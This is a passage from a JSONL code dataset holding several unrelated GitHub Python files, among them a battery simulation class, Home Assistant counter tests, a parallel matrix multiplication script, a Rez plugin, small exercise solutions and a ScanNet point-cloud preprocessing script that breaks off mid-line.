jsonify(resp)\n\n\n","repo_name":"yuewei1987/geekbar_backgroud","sub_path":"web/controllers/member/Member.py","file_name":"Member.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11005386434","text":"a = [35,49,53,61,78,84,96,121,132,149]\ni = 0\nz = 0\nm = a[0]\nt = a[0]\nmedia = 0\nwhile(i != 9):\n z = a[i + 1] - a[i]\n if z > 0:\n p = a[i + 1] - t\n if p > 0:\n t = a[i + 1]\n if z < 0:\n p = m - a[i + 1]\n if p > 0:\n m = a[i + 1]\n i += 1\nprint(f\"max: {t} min: {m}\")\ni = 0\nmedia = 1\nwhile(media > 0):\n media = t - m - (2 * i)\n #print(f\"media: {media} i: {i}\")\n i += 1\noutput = i - 1\n\nmedia = m + output\n\nprint(f\"resultado por agoritmo instruido: {media}\")\navrage = sum(a)/len(a)\nprint(f\"promedio obtenido forma tradicional: {avrage}\")\n\n#este es mi algoritmo, no modifique el original\ni = 0\nmedia = 1\nwhile(media > 0):\n media = sum(a) - 10 * i\n i += 1\noutput = i - 1\n\nprint(f\"promedio obtenido con mi agloritmo: {output}\")\n \nimport random\nfor _ in range(96):\n randomlist = random.sample(range(0, 1024), 10)\n for i in randomlist:\n print(i)\n 
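Stepping back to the Flask member listing above: it converts a 1-based page number into a slice of the query results with a simple offset/limit computation. That arithmetic on its own, with an illustrative `PAGE_SIZE` in place of the app config value:

```python
# Page-to-slice arithmetic used by the listing view; PAGE_SIZE is illustrative.
PAGE_SIZE = 20

def page_slice(page):
    """Return (offset, limit) bounds for a 1-based page number."""
    offset = (page - 1) * PAGE_SIZE
    limit = PAGE_SIZE * page
    return offset, limit

print(page_slice(1))  # (0, 20)  -> rows[0:20]
print(page_slice(3))  # (40, 60) -> rows[40:60]
```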
","repo_name":"DemiurgeApeiron/A01028325-InternetOfThings","sub_path":"act3/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71753612722","text":"# %%\nimport numpy as np\nimport multiprocessing\nimport os\nfrom numpy import genfromtxt\nfrom optparse import OptionParser\nimport math\n\nprint('Parallel Matrix Multiplication')\n\n# %%\ndef lineMult(start):\n global A, B, C, part\n n = len(A)\n # print('starts from {} and ends {}'.format(start, start+part))\n for i in range(start, start+part):\n for k in range(n):\n for j in range(n):\n C[i][j] += A[i][k] * B[k][j]\n return C\n\n# %%\ndef ikjMatrixProduct(A, B, num_thread):\n n = len(A)\n pool = multiprocessing.Pool(num_thread)\n # print(list(range(0, n, part)))\n results = pool.map(lineMult, list(range(0,n, part)))\n return sum(results)\n\n# %%\nbase_path='./test_data'\n\n\n# %%\nif __name__ == \"__main__\":\n parser = OptionParser()\n # takes size as an arg\n parser.add_option(\"-s\",\n dest=\"size\",\n default=\"2\",\n help=\"input matrix size\")\n\n parser.add_option(\"-t\",\n dest=\"thread\",\n default=\"1\",\n help=\"input thread number\")\n (options, args) = parser.parse_args()\n\n print('Matrix Size: {}'.format(options.size))\n print('Thread Number: {}'.format(options.thread))\n\n size = options.size\n num_thread = int(options.thread)\n\n file_A = 'A_' + str(size) + '.csv'\n file_B = 'B_' + str(size) + '.csv'\n path_A = os.path.join(base_path, file_A)\n path_B = os.path.join(base_path, file_B)\n\n A = genfromtxt(path_A, delimiter=',')\n B = genfromtxt(path_B, delimiter=',')\n \n n, m,l= len(A), len(A[0]), len(B[0])\n C = np.zeros((n, l))\n part = int(len(A) / num_thread)\n if part < 1:\n part = 1\n C = ikjMatrixProduct(A, B, num_thread)\n\n print()","repo_name":"hansensen/MultiprocessorSystemProject","sub_path":"2_vanilla_parallel.py","file_name":"2_vanilla_parallel.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28264480236","text":"\"\"\"\nRez suite composing GUI\n\"\"\"\nimport os\nimport sys\nimport types\nimport argparse\ntry:\n from rez.command import Command\nexcept ImportError:\n Command = object\n\n\ncommand_behavior = {}\n\n\ndef rez_cli():\n from rez.cli._main import run\n from rez.cli._entry_points import check_production_install\n check_production_install()\n try:\n return run(\"sweet\")\n except KeyError:\n pass\n # for rez version that doesn't have Command type plugin\n return standalone_cli()\n\n\ndef standalone_cli():\n # for running without rez's cli\n parser = argparse.ArgumentParser(\"sweet\")\n setup_parser(parser)\n opts = parser.parse_args()\n return command(opts)\n\n\ndef setup_parser(parser, completions=False):\n parser.add_argument(\"--version\", action=\"store_true\",\n help=\"Print out version of this plugin command.\")\n parser.add_argument(\"--gui\", action=\"store_true\")\n\n\ndef command(opts, parser=None, extra_arg_groups=None):\n import logging\n from sweet import cli, report\n report.init_logging()\n\n if opts.debug:\n log = logging.getLogger(\"sweet\")\n stream_handler = next(h for h in log.handlers if h.name == \"stream\")\n stream_handler.setLevel(logging.DEBUG)\n\n if opts.version:\n from sweet._version import print_info\n sys.exit(print_info())\n\n if opts.gui:\n from sweet.gui import app\n sys.exit(app.launch())\n\n return cli.main()\n\n\nclass 
CommandSweet(Command):\n schema_dict = {\n \"suite_roots\": dict,\n \"default_root\": str,\n \"release_root\": str,\n \"on_suite_saved_callback\": types.FunctionType,\n \"omit_internal_version\": str,\n }\n\n @classmethod\n def name(cls):\n return \"sweet\"\n\n\ndef find_configs(dir_path):\n configs = list()\n\n while True:\n config_file = os.path.join(dir_path, \".rezconfig.py\")\n if os.path.isfile(config_file):\n configs.append(config_file)\n\n parent_dir = os.path.dirname(dir_path)\n if parent_dir == dir_path:\n break # reach root\n\n dir_path = parent_dir\n\n return configs\n\n\ndef _FWD__invoke_suite_tool_alias_in_live(package_requests,\n context_name,\n tool_name,\n prefix_char=None,\n _script=None,\n _cli_args=None):\n # Load configs\n from rez.resolved_context import ResolvedContext\n from rez.config import _load_config_from_filepaths, config\n # todo: config override should be handled by the Application\n # launcher, not sweet.\n configs = find_configs(os.getcwd())\n overrides, _ = _load_config_from_filepaths(configs)\n for key, value in overrides.items():\n config.override(key, value)\n\n # todo: instead of parsing requests, load the rxt and re-resolve\n # again.\n suite_path = os.path.dirname(os.path.dirname(_script))\n context = ResolvedContext(package_requests)\n\n from rez.wrapper import Wrapper\n w = Wrapper.__new__(Wrapper)\n w._init(suite_path, context_name, context, tool_name, prefix_char)\n retcode = w.run(*(_cli_args or []))\n sys.exit(retcode)\n\n\ndef register_plugin():\n return CommandSweet\n","repo_name":"davidlatwe/sweet","sub_path":"src/sweet/rezplugins/command/sweet.py","file_name":"sweet.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"75"} +{"seq_id":"34953434161","text":"import numpy as np\nimport warnings\n\nclass Battery():\n '''\n A simple simulated battery\n \n Usage: Used to simulate batteries in any optimization model, logic model, or rollout\n \n \n Input:\n \n max_capacity: float, The maximum amount of capacity the battery can contain (should non-negative)\n \n Is by standard set to 13.0\n \n current_capacity: float, The amount currently in the battery (should non-negative <= max_capacity)\n \n Is by standard set to 0.0 \n \n max_charge: float, The maximum amount that can be charged/discharged at once (should non-negative <= max_capacity)\n \n Is by standard set to 7.0\n \n degrade_rate: float, The amount the battery degrades by (should be between 0 and 1)\n \n Is by standard set to 0.05, however, when charging degrading is turned off by default\n \n \n Example: bat = Battery(max_capacity = 13.0, max_charge = 7.0)\n \n bat.charge(15.0)\n \n capacity = bat.get_current_capacity() #=7.0\n \n surplus = bat.get_surplus() #=8.0\n \n \n Additional attributes:\n \n surplus: float, How much was leftover after charging (if abs(charge amount) > max_charge)\n \n Gets updated in charge function\n \n charge_list: float list, history of what has been charged/discharged\n \n Gets updated in charge function\n \n previous_capacity: float, The previous capacity before degrading and charging\n \n Gets updated in charge function\n \n previous_degraded_capacity: float, The previous capacity after degrading, before charging\n \n Gets updated in charge function\n \n \n Functions (check their docs):\n \n charge: float -> None\n or\n float * bool -> None\n \n degrade: float -> None\n \n round_one_decimal: float -> float\n \n get_surplus: -> float\n \n get_previous_capacity: -> float\n \n 
get_previous_degraded_capacity: -> float\n \n get_current_capacity: -> float\n \n get_max_capacity: -> float\n \n get_percentage: -> float\n '''\n def __init__(self, max_capacity = 13.0, current_capacity = 0.0, max_charge = 7.0, degrade_rate = 0.05): \n self.max_capacity = max_capacity\n self.current_capacity = current_capacity\n self.surplus = 0.0\n self.charge_list = np.array([])\n self.max_charge = max_charge\n self.degrade_rate = degrade_rate\n self.previous_capacity = 0.0\n self.previous_degraded_capacity = 0.0\n \n #Require max_capacity >= 0\n if self.max_capacity < 0.0:\n warnings.warn(f\"max_capacity must non-negative! Setting max_capacity = 0.0\")\n self.max_capacity = 0.0\n \n #Require current_capacity <= max_capacity\n if self.current_capacity > self.max_capacity:\n warnings.warn(f\"current_capacity = {self.current_capacity} must be less than or equal to max_capcity! Setting current_capacity = {self.max_capacity}\")\n self.current_capacity = self.max_capacity\n \n #Require current_capacity >= 0\n if self.current_capacity < 0.0:\n warnings.warn(f\"current_capacity = {self.current_capacity} must be non-negative! Setting current_capacity = 0.0\")\n self.current_capacity = 0.0\n \n #Require max_charge <= max_capacity\n if self.max_charge > self.max_capacity:\n warnings.warn(f\"max_charge = {self.max_charge} must be less than or equal to max_capcity! Setting max_charge = {self.max_capacity}\")\n self.max_charge = self.max_capacity\n \n #Require max_charge >= 0\n if self.max_charge < 0.0:\n warnings.warn(f\"max_charge = {self.current_capacity} must be non-negative! Setting max_charge = 0.0\")\n self.max_charge = 0.0\n\n def charge(self, amount, degrade=False):\n \"\"\"\n Charges the battery when amount is postive and otherwise discharges it\n \n Return type: None\n\n Usage: Used whenever the battery is charged or discharged in rollouts\n\n\n Input:\n\n amount: float, Amount of kWh to charge (positive), or discharge (negative)\n\n The battery is dynamic with this input, so if charged or discharged more than\n possible, the \"surplus\" attribute will be updated, so that it is known how\n much of the input did or did not enter/leave the battery\n\n degrade: bool, Whether battery should be degraded before charging\n\n By default is False, meaning no degrading\n\n\n Example: bat = Battery(max_capacity = 13.0, max_charge = 7.0)\n \n bat.charge(15.0)\n\n capacity = bat.get_current_capacity() #=7.0\n\n surplus = bat.get_surplus() #=8.0\n \"\"\"\n self.previous_capacity = self.current_capacity\n \n #Degrade battery by 1 hour\n if degrade:\n self.degrade(1)\n \n #Shorten to one decimal\n self.current_capacity = self.round_one_decimal(self.current_capacity) \n \n capacity = self.get_current_capacity() #capacity after degrade, before charge/discharge\n self.previous_degraded_capacity = capacity\n extra_amount = 0.0\n \n if amount <= 0.0:\n #Check for overcharging\n if amount < -self.max_charge:\n extra_amount = amount + self.max_charge\n amount = -self.max_charge\n \n #Check for overdraining\n if capacity + amount < 0.0:\n overdrain = capacity + amount\n extra_amount += overdrain\n amount -= overdrain\n \n else:\n #Check for overcharging\n if amount > self.max_charge:\n extra_amount = amount - self.max_charge\n amount = self.max_charge\n \n #Check for overfilling\n if capacity + amount > self.max_capacity:\n overfill = capacity + amount - self.max_capacity\n extra_amount += overfill\n amount -= overfill\n \n #Shorten to one decimal\n og_amount = amount+extra_amount\n amount = 
self.round_one_decimal(amount) \n extra_amount = og_amount-amount\n \n #Charge/discharge battery by amount and shorten to two decimals (edge case)\n self.current_capacity += amount\n self.current_capacity = self.round_one_decimal(self.current_capacity) \n \n self.surplus = extra_amount\n self.charge_list = np.append(self.charge_list,[amount])\n \n def degrade(self, hours):\n \"\"\"\n Degrades the battery by the degrade_rate for input amount of hours. Using this in charge,\n the output should be rounded, as to keep the number within one decimal\n \n Return type: None\n\n Usage: Used in charge function if degrade parameter is set to True\n\n\n Input:\n\n hours: float, how many hours the battery should be degraded for\n \n Is usually hours = 1, since the data is hourly, and so one action per hour,\n meaning one degration per hour\n\n\n Example: bat = Battery(max_capacity = 13.0, current_capacity=3.0, max_charge = 7.0, degrade_rate = 0.05)\n \n bat.degrade(1)\n \n capacity = bat.get_current_capacity() #=2.85\n \"\"\"\n self.current_capacity -= self.current_capacity * self.degrade_rate * hours\n \n def round_one_decimal(self, number):\n \"\"\"\n Returns the float that ignores everything beyond the first decimal\n \n Return type: float\n \"\"\"\n return int(number*10)/10\n \n def get_surplus(self):\n \"\"\"\n Returns the class attribute \"surplus\"\n \n Return type: float\n \"\"\"\n return self.surplus\n \n def get_previous_capacity(self):\n \"\"\"\n Returns the class attribute \"previous_capacity\"\n \n Return type: float\n \"\"\"\n return self.previous_capacity\n \n def get_previous_degraded_capacity(self):\n \"\"\"\n Returns the class attribute \"previous_degraded_capacity\"\n \n Return type: float\n \"\"\"\n return self.previous_degraded_capacity\n \n def get_current_capacity(self):\n \"\"\"\n Returns the class attribute \"current_capacity\"\n \n Return type: float\n \"\"\"\n return self.current_capacity\n \n def get_max_capacity(self):\n \"\"\"\n Returns the class attribute \"max_capacity\"\n \n Return type: float\n \"\"\"\n return self.max_capacity\n \n def get_percentage(self):\n \"\"\"\n Returns how full the battery is in %\n \n Return type: float\n \"\"\"\n return self.current_capacity / self.max_capacity * 100\n \n def __str__(self):\n return f\"Capacity: {self.get_current_capacity()}\"\n\nif __name__ == \"__main__\":\n print(\"This file is meant to be imported\")","repo_name":"LortSkit/Bachelor-project","sub_path":"Functions/Battery.py","file_name":"Battery.py","file_ext":"py","file_size_in_byte":9480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"31826249977","text":"import pytest\n\nfrom improver.cli import combine\nfrom improver.tests import acceptance as acc\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_basic(tmp_path):\n \"\"\"Test basic combine operation\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/basic\"\n kgo_path = kgo_dir / \"kgo_cloud.nc\"\n output_path = tmp_path / \"output.nc\"\n args = [\"--operation=max\",\n \"--new-name=cloud_area_fraction\",\n str(kgo_dir / \"low_cloud.nc\"),\n str(kgo_dir / \"medium_cloud.nc\"),\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_metadata(tmp_path):\n \"\"\"Test combining with a separate metadata file\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/metadata\"\n kgo_path = kgo_dir / \"kgo_prob_precip.nc\"\n precip_meta = kgo_dir / \"prob_precip.json\"\n output_path = tmp_path / 
\"output.nc\"\n new_name = \"probability_of_total_precipitation_rate_between_thresholds\"\n args = [\"--operation=-\",\n f\"--new-name={new_name}\",\n f\"--metadata_jsonfile={precip_meta}\",\n str(kgo_dir / \"precip_prob_0p1.nc\"),\n str(kgo_dir / \"precip_prob_1p0.nc\"),\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\n@pytest.mark.parametrize(\"minmax\", (\"min\", \"max\"))\ndef test_minmax_temperatures(tmp_path, minmax):\n \"\"\"Test combining minimum and maximum temperatures\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/bounds\"\n kgo_path = kgo_dir / f\"kgo_{minmax}.nc\"\n timebound_meta = kgo_dir / \"time_bound.json\"\n temperatures = kgo_dir.glob(f\"*temperature_at_screen_level_{minmax}.nc\")\n output_path = tmp_path / \"output.nc\"\n args = [f\"--operation={minmax}\",\n f\"--metadata_jsonfile={timebound_meta}\",\n *[str(t) for t in temperatures],\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_combine_accumulation(tmp_path):\n \"\"\"Test combining precipitation accumulations\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/accum\"\n kgo_path = kgo_dir / \"kgo_accum.nc\"\n rains = kgo_dir.glob(\"*rainfall_accumulation.nc\")\n timebound_meta = kgo_dir / \"time_bound.json\"\n output_path = tmp_path / \"output.nc\"\n args = [f\"--metadata_jsonfile={timebound_meta}\",\n *[str(r) for r in rains],\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_mean_temperature(tmp_path):\n \"\"\"Test combining mean temperature\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/bounds\"\n kgo_path = kgo_dir / \"kgo_mean.nc\"\n timebound_meta = kgo_dir / \"time_bound.json\"\n temperatures = kgo_dir.glob(\"*temperature_at_screen_level.nc\")\n output_path = tmp_path / \"output.nc\"\n args = [\"--operation=mean\",\n f\"--metadata_jsonfile={timebound_meta}\",\n *[str(t) for t in temperatures],\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n","repo_name":"15b3/improver","sub_path":"lib/improver/tests/cube_combiner/test_cli_combine.py","file_name":"test_cli_combine.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"1948331214","text":"# 5430, AC\n'''\ndeaueue : 양쪽 끝에서 추가, 삭제가 가능한 선형 구조 형태의 자료구조\nlist사용시 시간초과 발생\n'''\n\nimport sys\nfrom collections import deque\n\nt = int(input())\n\nfor i in range(t):\n\n p = sys.stdin.readline().rstrip()\n n = int(input())\n\n # 대괄호는 포함하면 안됨\n arr = sys.stdin.readline().rstrip()[1:-1].split(\",\")\n\n # deaue생성\n queue = deque(arr)\n\n rev, front, back = 0, 0, len(queue)-1\n flag = 0\n\n # 길이가 0인 경우는 초기화\n if n == 0:\n queue = []\n front = 0\n back = 0\n\n # 시간초과 안나게 해야함\n # 뒤집는 횟수가 홀수 번일때 뒤집도록 함(짝수번일경우 할 필요 없음)\n for j in p:\n if j == 'R':\n rev += 1\n elif j == 'D':\n if len(queue) < 1:\n flag = 1\n print(\"error\")\n break\n else:\n if rev % 2 == 0:\n queue.popleft()\n else:\n queue.pop()\n if flag == 0:\n if rev % 2 == 0:\n print(\"[\" + \",\".join(queue) + \"]\")\n else:\n queue.reverse()\n print(\"[\" + \",\".join(queue) + \"]\")\n","repo_name":"jeong-sys/Study","sub_path":"Baekjoon/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"14805885764","text":"'''\n217. 
存在重复元素\n难度 简单\n\n给定一个整数数组,判断是否存在重复元素。\n如果存在一值在数组中出现至少两次,函数返回 true 。如果数组中每个元素都不相同,则返回 false 。\n\n示例 1:\n输入: [1,2,3,1]\n输出: true\n\n示例 2:\n输入: [1,2,3,4]\n输出: false\n\n示例3:\n输入: [1,1,1,3,3,4,3,2,4,2]\n输出: true\n\n'''\n\ndef containsDuplicate(nums):\n if len(nums) == len(set(nums)):\n return False\n else:\n return True\n\nnums1 = [1,2,3,1]\nnums2 = [1,2,3,4]\nnums3 = [1,1,1,3,3,4,3,2,4,2]\nprint(containsDuplicate(nums1))\nprint(containsDuplicate(nums2))\nprint(containsDuplicate(nums3))","repo_name":"yanghaotai/leecode","sub_path":"leetcode/217.存在重复元素.py","file_name":"217.存在重复元素.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18581440563","text":"__author__ = 'wxy325'\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be inserted\n # @return integer\n def searchInsert(self, A, target):\n if len(A) == 0:\n return 0\n if target < A[0]:\n return 0\n return self.searchF(A, target, 0, len(A))\n\n def searchF(self, A, target, fromIndex, toIndex):\n if A[fromIndex] == target:\n return fromIndex\n if fromIndex == toIndex - 1:\n return fromIndex + 1\n\n\n mid = (fromIndex + toIndex) / 2\n v = A[mid]\n if v > target:\n return self.searchF(A, target, fromIndex, mid)\n else:\n return self.searchF(A, target, mid, toIndex)\n\nif __name__ == '__main__':\n s = Solution()\n print(s.searchInsert([1,3], 2))","repo_name":"wxy325/leetCodePython","sub_path":"SearchInsertPosition.py","file_name":"SearchInsertPosition.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9751582741","text":"#3 6 9 게임의 왕이 되기 위한 369 마스터 프로그램을 작성해 보자.\n\nn=int(input())\n\nfor i in range(1,n+1):\n if i%10==3 or i%10==6 or i%10==9:\n print('X',end=' ')\n\n else:\n print(i,end=' ')\n","repo_name":"thetomatoaddict/TIL","sub_path":"Python/CodeUp/codeup_6082.py","file_name":"codeup_6082.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"20419587435","text":"\"\"\"The tests for the counter component.\"\"\"\n# pylint: disable=protected-access\nimport asyncio\nimport unittest\nimport logging\n\nfrom homeassistant.core import CoreState, State\nfrom homeassistant.setup import setup_component, async_setup_component\nfrom homeassistant.components.counter import (\n DOMAIN, decrement, increment, reset, CONF_INITIAL, CONF_STEP, CONF_NAME,\n CONF_ICON)\nfrom homeassistant.const import (ATTR_ICON, ATTR_FRIENDLY_NAME)\n\nfrom tests.common import (get_test_home_assistant, mock_restore_cache)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass TestCounter(unittest.TestCase):\n \"\"\"Test the counter component.\"\"\"\n\n # pylint: disable=invalid-name\n def setUp(self):\n \"\"\"Set up things to be run when tests are started.\"\"\"\n self.hass = get_test_home_assistant()\n\n # pylint: disable=invalid-name\n def tearDown(self):\n \"\"\"Stop everything that was started.\"\"\"\n self.hass.stop()\n\n def test_config(self):\n \"\"\"Test config.\"\"\"\n invalid_configs = [\n None,\n 1,\n {},\n {'name with space': None},\n ]\n\n for cfg in invalid_configs:\n self.assertFalse(\n setup_component(self.hass, DOMAIN, {DOMAIN: cfg}))\n\n def test_config_options(self):\n \"\"\"Test configuration options.\"\"\"\n count_start = len(self.hass.states.entity_ids())\n\n _LOGGER.debug('ENTITIES @ start: %s', self.hass.states.entity_ids())\n\n 
config = {\n DOMAIN: {\n 'test_1': {},\n 'test_2': {\n CONF_NAME: 'Hello World',\n CONF_ICON: 'mdi:work',\n CONF_INITIAL: 10,\n CONF_STEP: 5,\n }\n }\n }\n\n assert setup_component(self.hass, 'counter', config)\n self.hass.block_till_done()\n\n _LOGGER.debug('ENTITIES: %s', self.hass.states.entity_ids())\n\n self.assertEqual(count_start + 2, len(self.hass.states.entity_ids()))\n self.hass.block_till_done()\n\n state_1 = self.hass.states.get('counter.test_1')\n state_2 = self.hass.states.get('counter.test_2')\n\n self.assertIsNotNone(state_1)\n self.assertIsNotNone(state_2)\n\n self.assertEqual(0, int(state_1.state))\n self.assertNotIn(ATTR_ICON, state_1.attributes)\n self.assertNotIn(ATTR_FRIENDLY_NAME, state_1.attributes)\n\n self.assertEqual(10, int(state_2.state))\n self.assertEqual('Hello World',\n state_2.attributes.get(ATTR_FRIENDLY_NAME))\n self.assertEqual('mdi:work', state_2.attributes.get(ATTR_ICON))\n\n def test_methods(self):\n \"\"\"Test increment, decrement, and reset methods.\"\"\"\n config = {\n DOMAIN: {\n 'test_1': {},\n }\n }\n\n assert setup_component(self.hass, 'counter', config)\n\n entity_id = 'counter.test_1'\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(0, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(1, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(2, int(state.state))\n\n decrement(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(1, int(state.state))\n\n reset(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(0, int(state.state))\n\n def test_methods_with_config(self):\n \"\"\"Test increment, decrement, and reset methods with configuration.\"\"\"\n config = {\n DOMAIN: {\n 'test': {\n CONF_NAME: 'Hello World',\n CONF_INITIAL: 10,\n CONF_STEP: 5,\n }\n }\n }\n\n assert setup_component(self.hass, 'counter', config)\n\n entity_id = 'counter.test'\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(10, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(15, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(20, int(state.state))\n\n decrement(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(15, int(state.state))\n\n\n@asyncio.coroutine\ndef test_initial_state_overrules_restore_state(hass):\n \"\"\"Ensure states are restored on startup.\"\"\"\n mock_restore_cache(hass, (\n State('counter.test1', '11'),\n State('counter.test2', '-22'),\n ))\n\n hass.state = CoreState.starting\n\n yield from async_setup_component(hass, DOMAIN, {\n DOMAIN: {\n 'test1': {},\n 'test2': {\n CONF_INITIAL: 10,\n },\n }})\n\n state = hass.states.get('counter.test1')\n assert state\n assert int(state.state) == 0\n\n state = hass.states.get('counter.test2')\n assert state\n assert int(state.state) == 10\n\n\n@asyncio.coroutine\ndef test_no_initial_state_and_no_restore_state(hass):\n \"\"\"Ensure that entity is create without initial and restore feature.\"\"\"\n hass.state = CoreState.starting\n\n yield from async_setup_component(hass, DOMAIN, {\n DOMAIN: {\n 'test1': {\n CONF_STEP: 5,\n 
}\n }})\n\n state = hass.states.get('counter.test1')\n assert state\n assert int(state.state) == 0\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/tests/components/counter/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"8166134479","text":"import numpy as np\nimport os\nimport imageio\nfrom os.path import join\nfrom os import listdir\nimport glob\nimport sys\nsys.path.append('.')\nfrom im2mesh.dvr_common import transform_to_camera_space, get_tensor_values, arange_pixels, transform_to_world\nimport torch\nimport trimesh\nfrom tqdm import tqdm\n\n\nds_path = '/is/rg/avg/mniemeyer/project_data/2020/scalable_onet/data/ScanNet/scenes'\neps = 0.01\nn_pts_pcl = 80000\nn_pts_uni = 20000\nsubsample_views = 0\nn_img_points = 5000\n\n# scenes = listdir(ds_path)\n# scenes.sort()\n# scenes = [scenes[0]]\n\n#scenes = ['scene0370_00']\nscenes = ['scene0134_02']\n\nfor scene in scenes:\n scene_path = join(ds_path, scene)\n cam = np.load(join(scene_path, 'cameras.npz'))\n pcl = np.load(join(scene_path, 'pointcloud.npz'))['points'].astype(np.float32)\n bmin, bmax = torch.from_numpy(np.min(pcl, axis=0)), torch.from_numpy(np.max(pcl, axis=0))\n depth_files = glob.glob(join(scene_path, 'depth', '*.png'))\n depth_files.sort()\n print('Number of views: %d' % (len(depth_files)))\n\n if subsample_views > 0:\n skip_ids = np.random.choice(len(depth_files), size=(len(depth_files) - subsample_views,), replace=False)\n else:\n skip_ids = []\n\n p_out = []\n p_out2 = []\n for idx, depth_file in tqdm(enumerate(depth_files)):\n if idx in skip_ids:\n continue\n cm = torch.from_numpy(cam['camera_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n wm = torch.from_numpy(cam['world_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n sm = torch.from_numpy(cam['scale_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n depth = torch.from_numpy(imageio.imread(depth_file).astype(np.float32)) / 1000\n h, w = depth.shape\n depth = depth.view(1, 1, h, w)\n #pixels = arange_pixels(resolution=(h, w))[1]\n pixels = torch.rand(1, n_img_points, 2) * 2 - 1.\n d = get_tensor_values(depth, pixels)\n mask_gt = d[:,:,0] != 0\n add_eps = torch.rand_like(d) * eps\n p_world = transform_to_world(pixels, d+add_eps, cm, wm, sm)\n d_free = (0.25 + torch.rand_like(d) * 0.75) * d\n p_world_free = transform_to_world(pixels, d_free, cm, wm, sm)\n p_out.append(p_world[mask_gt])\n p_out2.append(p_world_free[mask_gt])\n\n p_out = torch.cat(p_out).unsqueeze(0)\n occ = torch.ones(1, p_out.shape[1]).bool()\n for idx, depth_file in tqdm(enumerate(depth_files)):\n if idx in skip_ids:\n continue\n cm = torch.from_numpy(cam['camera_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n wm = torch.from_numpy(cam['world_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n sm = torch.from_numpy(cam['scale_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n depth = torch.from_numpy(imageio.imread(depth_file).astype(np.float32)) / 1000\n h, w = depth.shape\n depth = depth.view(1, 1, h, w)\n p_cam = transform_to_camera_space(p_out, cm, wm, sm)\n pixels = p_cam[:, :, :2] / p_cam[:, :, -1].unsqueeze(-1)\n mask_pixel = (\n (pixels[:, :, 0] >= -1) &\n (pixels[:, :, 1] >= -1) &\n (pixels[:, :, 0] <= 1) &\n (pixels[:, :, 1] <= 1)\n )\n \n d_gt = get_tensor_values(depth, pixels).squeeze(-1)\n mask_gt = d_gt > 0\n d_hat = p_cam[:, :, -1]\n mask_pred = d_hat > 0\n\n mask = mask_pixel & mask_gt & 
